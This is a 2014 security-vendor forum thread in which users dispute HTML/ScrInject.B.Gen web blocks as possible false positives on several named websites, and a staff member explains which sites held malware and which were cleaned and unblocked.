HTML/Scrinject.B.Gen virus false positive?

[RPaxman 0]

I am getting the message that I have been infected with the HTML/Scrinject.B.Gen virus. The timing of the infection coincides with a visit to a forum - ScrapGirls.net. 

 

I have talked to the owner of the company and she insists that this is a false positive that only ESET is giving. She has contacted her support team and they swear that they can't find it. They believe that they are not responsible. They claim that they cannot talk to ESET about why this is happening and that I need to contact ESET instead because they don't get blocked by other anti-virus software when they try to visit the forum.

 

(ESET blocks me from visiting the forum and has blocked me from it for months. I only got there yesterday by forcing my way through.)

 

ESET keeps reporting to me that it is unable to clean the virus files. I ran Malwarebytes last night and it didn't find the infection.

 

What should I do? Is this a real infection or a false positive? 

 

I'll appreciate your input very much.

 

 

[Marcos 5,074]

The website in question was blocked about 3 months ago due to a Java exploit 3 months ago. I've checked it now and the website seems to be clean now, hence it can be removed from blacklist.

[RPaxman 0]

Thanks, Marcos. Is that something you can do? I certainly don't have the ability to do it!

[Peter Randziak 1,130]

Hello,

 

our malware research can do it, Marcos will arrange it.

[RNFolsom 5]

On the night of Tuesday 01 April 2014 (this is NOT an April fool test), when I was trying to download a financial document from New World Investor, NOD32 v7.0.302.26 (which I have been using almost since it first came out) blocked the attempt, with the statement
"Access to the web page was blocked.  Show URL
"[hxxp://newworldinvestor.com/access-for-members-only]
"The web page is on the list of websites with potentially dangerous content.
"Open ESET KnowledgeBase  |  www.eset.com"

 

In response to that block, I received a request from ESET Nod32 for more information, and I did my best to reply, but several of the questions were much too vague to answer.  Unfortunately, I didn't keep a list of the questions and my attempts to respond.  But I did get a message that I would be contacted by email.  So far, that hasn't happened.
 

This blockage was the first time that ESET has claimed to me that New World Investor was an evil website.

 

Since I have been using Michael Murphy's New World Investor newsletter since May 2006, and have used his previous newsletters since September 1996, I was very surprised to read that ESET thinks that Michael Murphy is a malware source.

 

In order to download last week's NWI file (I was late), I had to switch from my Standard user account to an Administrator account, disable Eset NOD32, and then download the file.  After I enabled Eset NOD32 and had returned to my Standard user account, I could not find any problems in the downloaded file.

 

But just to be on the safe side, today I did a full InDepth scan of my entire laptop computer (all four partitions;  the last two are storage from previous laptops), and discovered that the alleged malware was the ScrInject.B.Gen virus.  The scan uncovered 70+ threats with that virus, all being New World Investor downloads, as early as 2009.  But it did not include yesterday's downloaded file (unless I missed it in the pile of 70+ threats), perhaps because I usually edit the NWI weekly download file, deleting material in which I was not interested, but I have not yet edited the file I downloaded yesterday.  So maybe my edits made the past documents (each almost certainly edited, because my edits include some minor formatting) look like they had a virus.

 

On the other hand, the last two sentences in my previous paragraph may be nonsense, because previous Eset NOD32 InDepth scans had never before seen a virus in my NWI downloads.

 

Today I also did a Google search for ScrInject.B.Gen, and discovered this thread.  And the Google search came up with a substantial quantity of other complaints about that Eset's faulty blockings.

 

But perhaps ESET's NOD32 is right to block ScrInject.B.Gen.  If so, has Michael Murphy's New World Investor website been captured?  Is the sender of his emails, nwiactive@aweber.com, a malware site?  [i went to www.aweber.com, and it sure looks legitimate.]

The Block's statement that "The web page is on the list of websites with potentially dangerous content" isn't very useful information for me, or anyone else who gets that message.  What list is Eset talking about?  One that Eset owns, or one owned by some third party?

Do I have to disable NOD32 every week when I want to read the latest New World Investor report (known as a Radar Report)?

PLEASE DO THE FOLLOWING:

1) Contact Michael Murphy at New World Investor and tell him that his paid customers can't access his website (unless they disable Eset, or other anti-virus software).

If NWI documents really are ScrInject.B.Gen malware carriers, help him fix the problem.  I can't tell him what is wrong (because I don't know what is wrong), but Eset can.

If NWI documents are not ScrInject.B.Gen malware carriers, tell him so, and if there is some way to prevent NWI documents from wrongly appearing to be ScrInject.B.Gen malware carriers, either fix it at Eset, or tell him how to fix it on his website.

 

2) Meanwhile, please tell me what I can do to safely access New World Investor.  FYI, my laptop is a Dell Precision M4700, running Windows7sp1, with all Windows Updates installed (except for kb2862330 which has a bad reputation).

R.N. (Roger Nils) Folsom
 

Edited April 3, 2014 by RNFolsom

[Marcos 5,074]

I was unable to reproduce the detection while visiting the forum mentioned in the initial post. Please submit all *.ndf and *.nqf files you'll find in subfolders of the c:\user folder to samples[at]eset.com along with a link to this thread.

Also I'd strongly recommend upgrading from v5 to v7 which provides better protection thanks to Advanced memory scanner.

[Arakasi 549]

Hey Marcos

 

When i enter the following "newworldinvestor.com/‎" into my browser, i am rejected from the site and unable to proceed. 3:37pm 4/4/14

67.222.24.163

The web page is on the list of websites with potentially dangerous content.

[Marcos 5,074]

Newworldinvestor.com still contains malware and thus will remain blocked.

[ceyhun 0]

Hi Marcos,

our site listed of eset blacklist.

i stop and we are updating again please remove our web site in your  lists

www.hotelvillazurich.com/

[SweX 871]

Hi Marcos,

our site listed of eset blacklist.

i stop and we are updating again please remove our web site in your  lists

hxxp://www.hotelvillazurich.com/

 

https://www.virustotal.com/sv/url/b5223b5b01331c9168e1d7aa7b4be1c7605670009cfa7ca6c795b6e69e98945a/analysis/1397836453/

Edited April 18, 2014 by SweX

[Marcos 5,074]

Hi Marcos,

our site listed of eset blacklist.

i stop and we are updating again please remove our web site in your  lists

www.hotelvillazurich.com

Please report the block to ESET as per the instructions here.

[Sasgisor 0]

Hi Marcos,

 

my small and simple website is being blocked by NOD32 for several days now:

 

I scanned my URL with hxxp://www.scumware.org and it reports this:

2014-04-26 16:17:16	hxxp://parasite.kicks-######.org/wshots/	5A7687C5FB4C42DDBA25E5C1D30EDE9B	ESET	HTML/ScrInject.B.Gen virus

This is the VirusTotal report: https://www.virustotal.com/ru/url/3511e3688e66310bad220a0d39f13de8ec55e2c38ad2893193d27a83d11ecccc/analysis/1398657265/

(only ESET and its "friends" detect "something", but no one else).

 

I scanned the whole folder with NOD32 (with the most recent databases) and found ZERO threats:

 

So does the McAfee:

 

I also checked the files manually for any modifications since they were uploaded (none found).

 

I have emailed the issue to samples@ (with a proper SUBJ "Whitelist domain parasite.kicks-######.org" and written BODY plus screenshot) several times and get zero response at all.

 

What can I do now? This ESET's false positive makes my clients run out scary - and noone in ESET support cooperates!!!

 

Thanks,

Sasgisor

Edited April 30, 2014 by Sasgisor

[Marcos 5,074]

I have emailed the issue to samples@ (with a proper SUBJ "Whitelist domain parasite.kicks-######.org" and written BODY plus screenshot) several times and get zero response at all.

What can I do now? This ESET's false positive makes my clients run out scary - and noone in ESET support cooperates!!! 

 

The domain is not blocked at the moment. Strange that there are "legit" domains with offensive 3-letter words in the name and show only a smile on the main page.

 

Last but not least, I'd like to ask everyone to create a separate topic for particular issues and to refrain from hijacking someone else's topics. Needless to say that this forum is not a means to report false positives or website blocks.

[Sasgisor 0]

>The domain is not blocked at the moment

Yes, that was unblocked yesterday morning via other ESET support's help. Thanks for the answer, anyway.

 

>Strange that there are "legit" domains with offensive 3-letter words in the name and show only a smile on the main page.

That website is DynDNS'ed one (my home computer), and it serves for several small projects within one domain name (in different folders). They are totally separated from each other, have different visitors etc. This is the reason I do not create the main page - there is nothing crosslinked among them all but the smile.

[RNFolsom 5]

My response to Eset's decision earlier this year --- I discovered it on 01 April 2014 --- to block access to the New World Investor financial newsletter is in this thread's message #5, although there may be a few other responses elsewhere in this website.  (I have no idea how to find my own posts in this Eset Security Forum website.)  My response pointed out that I had been subscribing to Michael Murphy's New World Investor financial newsletter for many years, and I have used his earlier financial news letters going back many many years.  And although my response notes that Eset NOD32 scans of my computer "discovered" 70+ New World Investor newsletters with the HTML/Scrinject.B.Gen virus, more recent scans "discovered" the HTML/Scrinject.B.Gen virus in only 32 New World Investors saved newsletters, all downloaded and saved in 2009!

 

No one at Eset ever responded to my complaints, posted here and maybe elsewhere on this website.

 

So when I received a New World Investor email that a new financial report was available on the NWI website, to access the NWI website I had to exit my standard user account, open my Administrator account, temporarily disable Eset's NOD 32 v7.0.302.26, download the financial report, re-enable Eset's NOD 32 v7.0.302.26, and print and read the report (which typically are almost 20 pages in length).

 

Like other financial newsletters, Michael Murphy's New World Investor recommendations sometimes are bad ones.  Maybe someone unhappy with some of New World Investor's worse recommendations got access to the list of sites that Eset used to protect against genuine HTML/Scrinject.B.Gen virus websites, and in revenge added NWI to that list. 

 

But now I have good news:  A miracle happened.  As of last week, I now can access the New World Investor website, and download its newsletters, without disabling Eset's NOD 32 v7.0.302.26.  I do not know what caused that problem to get fixed.

 

I do have two guesses of causes of the miracle.  One is that someone at Eset finally discovered my posts (there weren't many) and acted to stop being frightened of New World Investor's website and financial reports.  The other is that one of the Wall Street Journal's financial columnists --- Mark Hulbert --- recently wrote a column that mentioned Michael Murphy's New World Investor (and also other financial newsletters), and someone at Eset reads the WSJ.

 

In any case, I sincerely thank whoever removed New World Investor from Eset's HTML/Scrinject.B.Gen virus list.  My use of Eset's NOD32 goes back to version 2.x and maybe earlier than that.  I really didn't want to have to give it up.

 

R.N. (Roger) Folsom

Edited May 2, 2014 by RNFolsom

[Marcos 5,074]

No one at Eset ever responded to my complaints, posted here and maybe elsewhere on this website.

 

I've just searched for "newworldinvestor.com" on this forum and was able to find only your last post. Similarly I searched for the domain name in tickets from samples[at]eset.com but was able to find only one that we received on April 3, 2014 and a reply that the website still contained a malicious file was sent an hour later. Later we were contacted by Sucuri who cleaned the website and requested re-evaluation; the website was eventually unblocked more than a week ago.

[RNFolsom 5]

Marcos:

 

I never before heard of Securi, but I very much appreciate their cleaning up the New World Investor website.  And your statement that "the website was eventually unblocked more than a week ago" is consistent with my experience, since I now have been able to access New World Investor today and last week and the week before that.

 

I am sorry that you could not find my messages in early April inquiring why I could not access New World Investor.  The probable reason is that I didn't post them here.  On reflection, the instructions I received for responding to a blocked website were very confusing (I did not have nearly enough background to understand them, because I had never before had a blocked website), and I have no idea where I posted them.

 

My previous message mentioned that I have no idea how to find my posts on this website.  But in this case the reason apparently was that I posted them somewhere else, or emailed them as replies to the blocked website instructions.

 

I did save the contents of one of my messages, so here it is:

"R.N. Folsom's computer is a Dell Precision M4700 laptop, running Windows7 sp1.
"You request registry data, and I would be comfortable doing that, but I have absolutely no idea what registry data you want.
"You also request that I send standard information, without a clue about what you mean (other than the top line in this document)."

 

I don't know where I sent that message.  But I am sure that I did not get a response.

 

R.N. (Roger) Folsom

 

P.S. FYI, I have four Eset accounts:  On a Dell C840 and on an IBM-A31 laptop, each is still using WindowsXPsp3 and NOD32 5.x because they are enroute to being replaced.  But almost all of my computing has been done since early 2013 on my current 64-bit Dell Precision M4700 laptop, running Win7sp1, and NOD32 v7.0.302.26.  The fourth account will be used on my wife's new Lenovo ThinkPad T530 Laptop with Win7sp1 (and NOD32 v7.0.302.26), as soon as I can get the time to set it up.
 

Edited May 3, 2014 by RNFolsom

[Mat 0]

i am unable to acess pages on hxxp:// downtraining.net because virus HTML/ScrInject.B.Gen is it still on the infected list

[Marcos 5,074]

i am unable to acess pages on hxxp:// downtraining.net because virus HTML/ScrInject.B.Gen is it still on the infected list

 

Please find an explanation here: hxxp://sitecheck.sucuri.net/results/downtraining.net.

[C Mayer 0]

Hi I just discovered HTML/ScrInject.B.Gen -

 

One of my favorite websites (Which I visit regularly) : htt p:// www.webcam-hd.fr/en/

Is no longer accessible; ESET blocks it now - I get the pop-up window warning for HTML/ScrInject.B.Gen.

I also contacted the website (through their facebook page) and they of course insist that its my computer that is infected, not their website.

 

But this seems illogical to me.

I can't access the site because ESET is preventing  the access to an infected site; not the other way around - right?

Can somebody confirm this for me?

[Arakasi 549]

Yes it is blocked. Immediately after visiting the site, the index was sent to ESET for analysis automatically through the software.

[Marcos 5,074]

Hi I just discovered HTML/ScrInject.B.Gen -

 

One of my favorite websites (Which I visit regularly) Is no longer accessible; ESET blocks it now - I get the pop-up window warning for HTML/ScrInject.B.Gen.

I also contacted the website (through their facebook page) and they of course insist that its my computer that is infected, not their website.

 

The web page loads an external script loaded from a highly suspicious server. Please notify the website owner and ask him or her to fix it.

[Aywen 0]

Hello,

My ESET started warning me about ScrInject.B.Gen on my own website (wordpress). I have checked my website for threats and resolved any possible problems but ESET still won't allow me to visit it.

How do I find the source of the problem?

[SweX 871]

Hello,

My ESET started warning me about ScrInject.B.Gen on my own website (wordpress). I have checked my website for threats and resolved any possible problems but ESET still won't allow me to visit it.

How do I find the source of the problem?

Hello,

 

Its OK to post a link (non-clickable) to the website.

[Aywen 0]

 

Hello,

My ESET started warning me about ScrInject.B.Gen on my own website (wordpress). I have checked my website for threats and resolved any possible problems but ESET still won't allow me to visit it.

How do I find the source of the problem?

Hello,

 

Its OK to post a link (non-clickable) to the website.

 

Excuse me for that!

here it is www.cavalier-noir.org